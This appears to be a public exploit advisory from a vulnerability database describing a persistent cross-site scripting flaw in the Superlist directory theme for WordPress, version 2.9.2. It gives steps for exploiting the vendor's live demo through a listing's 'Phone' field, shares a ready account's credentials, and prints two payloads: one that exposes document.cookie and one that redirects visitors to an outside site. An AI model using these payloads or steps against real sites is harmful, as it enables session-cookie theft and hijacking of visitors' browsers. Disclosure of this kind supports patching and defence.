Superlist - Directory WordPress Theme v2.9.2 Persistent XSS

2019.12.02
ru SubversA (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Superlist - Directory WordPress Theme v2.9.2 Persistent XSS # Google Dork: /wp-content/themes/superlist/ # Date: 02/12/2019 # Exploit Author: SUBVΞRSΛ # Vendor Homepage: https://byaviators.com/en/ # Software Link: https://themeforest.net/item/superlist-directory-wordpress-theme/13507181 # Version: 2.9.2 [ 2.880 Sales ] # Tested on: Parrot OS # CVE : - # CWE : 79 ----[]- Persistent XSS: -[]---- You need a new basic user account (register your own here https://superlist.byaviators.com/create/?type=job or use mine: subversa/subversa), then go to the https://superlist.byaviators.com/create/?type=job&step=contact page for new listing submit right on the «Contact» step. You'll see the vulnerable input fields, f.e. «Phone». Use payload like provided below and save your listing. The point is, you need to «break» the «Phone» <a> tag and inject desired payload inside it. All data from the form steps is stored as a cookie. Payload Sample #0: " /onmouseover="alert(document.cookie);" /onauxclick="alert(document.domain);" Payload Sample #1: " /onmouseover="console.log(`SUBVΞRSΛ`);" /onauxclick="alert(`PoC`);window.location.replace(`http://defcon.su`);"


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top